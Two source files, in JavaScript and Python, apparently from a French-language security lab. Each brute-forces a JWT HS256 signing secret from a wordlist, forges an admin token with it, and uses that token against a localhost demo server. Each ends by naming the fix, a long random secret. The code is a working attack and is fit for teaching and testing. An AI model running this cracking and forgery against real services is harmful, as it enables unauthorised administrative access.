File: attacks/3_brute_force.js
const crypto = require('crypto');
const fs     = require('fs');
const path   = require('path');

const BASE_URL = 'http://localhost:3000';

const BUILT_IN_WORDLIST = [
  'password', '123456', 'admin', 'letmein', 'qwerty', 'abc123',
  'monkey', 'dragon', 'master', 'welcome', 'login', 'pass',
  'test', 'root', 'user', 'key', 'hello', 'world',
  'secret', 'mysecret', 'jwt', 'jwtkey', 'jwt_secret', 'secretkey',
  'supersecret', 'token', 'mytoken', 'authkey', 'hmackey',
  'password1', 'Password1', 'p@ssword', 's3cr3t', 'S3cr3t',
];

function banner(title) {
  console.log('\n' + '─'.repeat(60));
  console.log(' ' + title);
  console.log('─'.repeat(60));
}

function tryCandidateSecret(headerB64, payloadB64, tokenSig, candidate) {
  const expected = crypto
    .createHmac('sha256', candidate)
    .update(`${headerB64}.${payloadB64}`)
    .digest('base64url');
  return expected === tokenSig;
}

async function run() {
  banner('ATTAQUE 3 : Force brute du secret HS256 (offline)');

  console.log('\n[1] Obtention d\'un token JWT HS256 valide (login alice)...');
  const loginRes = await fetch(`${BASE_URL}/auth/login`, {
    method:  'POST',
    headers: { 'Content-Type': 'application/json' },
    body:    JSON.stringify({ username: 'alice', password: 'password123' }),
  });
  const { token } = await loginRes.json();
  console.log('    Token intercepté :', token);

  const parts = token.split('.');
  if (parts.length !== 3) {
    console.error('Format de token inattendu'); process.exit(1);
  }
  const [headerB64, payloadB64, tokenSig] = parts;

  const args        = process.argv.slice(2);
  const wlIdx       = args.indexOf('--wordlist');
  const wordlistArg = wlIdx !== -1 ? args[wlIdx + 1] : null;

  let wordlist;
  let wordlistName;

  if (wordlistArg && fs.existsSync(wordlistArg)) {
    wordlistName = path.basename(wordlistArg);
    console.log(`\n[2] Dictionnaire externe : ${wordlistArg}`);
    wordlist = null;
  } else {
    wordlistName = 'dictionnaire intégré';
    console.log(`\n[2] Dictionnaire intégré (${BUILT_IN_WORDLIST.length} mots)`);
    wordlist = BUILT_IN_WORDLIST;
  }

  console.log(`\n[3] Démarrage de l'attaque par force brute (${wordlistName})...`);
  console.log('    Header JWT  :', headerB64);
  console.log('    Signature   :', tokenSig);
  console.log();

  const startTime = Date.now();
  let tested = 0;
  let found  = null;

  if (wordlist) {
    for (const word of wordlist) {
      tested++;
      process.stdout.write(`\r    Testé : ${tested.toString().padStart(5)} / ${wordlist.length} — candidat courant : "${word.padEnd(20)}"`);
      if (tryCandidateSecret(headerB64, payloadB64, tokenSig, word)) {
        found = word; break;
      }
    }
    process.stdout.write('\n');
  } else {
    const fileContent = fs.readFileSync(wordlistArg, 'latin1');
    const lines       = fileContent.split('\n');
    for (const line of lines) {
      const word = line.trim();
      if (!word) continue;
      tested++;
      if (tested % 10000 === 0) {
        process.stdout.write(`\r    Testé : ${tested.toLocaleString()} mots...`);
      }
      if (tryCandidateSecret(headerB64, payloadB64, tokenSig, word)) {
        found = word; break;
      }
    }
    process.stdout.write('\n');
  }

  const elapsedMs = Date.now() - startTime;
  const elapsed   = (elapsedMs / 1000).toFixed(3);
  const rate      = elapsedMs > 0 ? Math.round(tested / (elapsedMs / 1000)) : tested;

  console.log(`\n    Mots testés : ${tested.toLocaleString()}`);
  console.log(`    Durée       : ${elapsed}s`);
  console.log(`    Débit       : ~${rate.toLocaleString()} hash/s (Node.js mono-thread)`);

  if (found) {
    console.log(`\n✅ SECRET TROUVÉ : "${found}"`);
    console.log('\n[4] Exploitation — forge d\'un token admin avec le secret découvert...');

    function b64Encode(obj) { return Buffer.from(JSON.stringify(obj)).toString('base64url'); }
    const fHeader    = b64Encode({ alg: 'HS256', typ: 'JWT' });
    const fPayload   = b64Encode({ username: 'attacker', role: 'admin', iat: Math.floor(Date.now() / 1000) });
    const fSig       = crypto.createHmac('sha256', found).update(`${fHeader}.${fPayload}`).digest('base64url');
    const adminToken = `${fHeader}.${fPayload}.${fSig}`;

    const adminRes  = await fetch(`${BASE_URL}/api/admin`, {
      headers: { Authorization: `Bearer ${adminToken}` },
    });
    const adminData = await adminRes.json();
    console.log('    Accès admin :', adminRes.status, JSON.stringify(adminData));
  } else {
    console.log('\n❌ Secret non trouvé dans ce dictionnaire.');
    if (!wordlistArg) console.log('   → Essayez avec rockyou.txt : --wordlist /path/to/rockyou.txt');
  }

  banner('FIN DE L\'ATTAQUE 3');
  console.log('\nCorrection : utiliser un secret aléatoire long (>= 256 bits).');
  console.log('Exemple :  crypto.randomBytes(32).toString("hex")\n');
}

run().catch(err => {
  console.error('\n[ERREUR] :', err.message);
  console.error('→ Assurez-vous que le serveur est lancé : node server.js\n');
  process.exit(1);
});

File: attacks/3_brute_force.py
import json
import hmac
import hashlib
import base64
import time
import sys
import os
import requests

BASE_URL = "http://localhost:3000"

BUILT_IN_WORDLIST = [
    "password", "123456", "admin", "letmein", "qwerty", "abc123",
    "monkey", "dragon", "master", "welcome", "login", "pass",
    "test", "root", "user", "key", "hello", "world",
    "secret", "mysecret", "jwt", "jwtkey", "jwt_secret", "secretkey",
    "supersecret", "token", "mytoken", "authkey", "hmackey",
    "password1", "Password1", "p@ssword", "s3cr3t", "S3cr3t",
]


def b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_encode_json(obj):
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def banner(title):
    print("\n" + "-" * 60)
    print(" " + title)
    print("-" * 60)


def try_candidate(header_b64, payload_b64, token_sig, candidate):
    expected = hmac.new(
        candidate.encode(),
        f"{header_b64}.{payload_b64}".encode(),
        hashlib.sha256,
    ).digest()
    return b64url_encode(expected) == token_sig


def run():
    banner("ATTAQUE 3 : Force brute du secret HS256 (offline)")

    print("\n[1] Obtention d'un token JWT HS256 valide (login alice)...")
    r = requests.post(f"{BASE_URL}/auth/login", json={"username": "alice", "password": "password123"})
    token = r.json()["token"]
    print(f"    Token intercepte : {token}")

    parts = token.split(".")
    if len(parts) != 3:
        print("Format de token inattendu")
        return
    header_b64, payload_b64, token_sig = parts

    wordlist_arg = None
    if "--wordlist" in sys.argv:
        idx = sys.argv.index("--wordlist")
        if idx + 1 < len(sys.argv):
            wordlist_arg = sys.argv[idx + 1]

    if wordlist_arg and os.path.exists(wordlist_arg):
        wordlist_name = os.path.basename(wordlist_arg)
        print(f"\n[2] Dictionnaire externe : {wordlist_arg}")
        wordlist = None
    else:
        wordlist_name = "dictionnaire integre"
        print(f"\n[2] Dictionnaire integre ({len(BUILT_IN_WORDLIST)} mots)")
        wordlist = BUILT_IN_WORDLIST

    print(f"\n[3] Demarrage de l'attaque par force brute ({wordlist_name})...")
    print(f"    Header JWT  : {header_b64}")
    print(f"    Signature   : {token_sig}")
    print()

    start_time = time.time()
    tested = 0
    found = None

    if wordlist:
        for word in wordlist:
            tested += 1
            print(f'\r    Teste : {tested:>5} / {len(wordlist)} — candidat courant : "{word:<20}"', end="", flush=True)
            if try_candidate(header_b64, payload_b64, token_sig, word):
                found = word
                break
        print()
    else:
        with open(wordlist_arg, encoding="latin-1") as f:
            for line in f:
                word = line.strip()
                if not word:
                    continue
                tested += 1
                if tested % 10000 == 0:
                    print(f"\r    Teste : {tested:,} mots...", end="", flush=True)
                if try_candidate(header_b64, payload_b64, token_sig, word):
                    found = word
                    break
        print()

    elapsed = time.time() - start_time
    rate = int(tested / elapsed) if elapsed > 0 else tested

    print(f"\n    Mots testes : {tested:,}")
    print(f"    Duree       : {elapsed:.3f}s")
    print(f"    Debit       : ~{rate:,} hash/s (Python mono-thread)")

    if found:
        print(f'\nSECRET TROUVE : "{found}"')
        print("\n[4] Exploitation — forge d'un token admin avec le secret decouvert...")

        f_header = b64url_encode_json({"alg": "HS256", "typ": "JWT"})
        f_payload = b64url_encode_json({"username": "attacker", "role": "admin", "iat": int(time.time())})
        f_sig = b64url_encode(
            hmac.new(found.encode(), f"{f_header}.{f_payload}".encode(), hashlib.sha256).digest()
        )
        admin_token = f"{f_header}.{f_payload}.{f_sig}"

        admin_res = requests.get(f"{BASE_URL}/api/admin", headers={"Authorization": f"Bearer {admin_token}"})
        admin_data = admin_res.json()
        print(f"    Acces admin : {admin_res.status_code} {json.dumps(admin_data)}")
    else:
        print("\nSecret non trouve dans ce dictionnaire.")
        if not wordlist_arg:
            print("   -> Essayez avec rockyou.txt : --wordlist /path/to/rockyou.txt")

    banner("FIN DE L'ATTAQUE 3")
    print("\nCorrection : utiliser un secret aleatoire long (>= 256 bits).")
    print('Exemple :  secrets.token_hex(32)\n')


if __name__ == "__main__":
    try:
        run()
    except requests.ConnectionError:
        print("\n[ERREUR] Impossible de contacter le serveur.")
        print("-> Assurez-vous que le serveur est lance : python server.py\n")
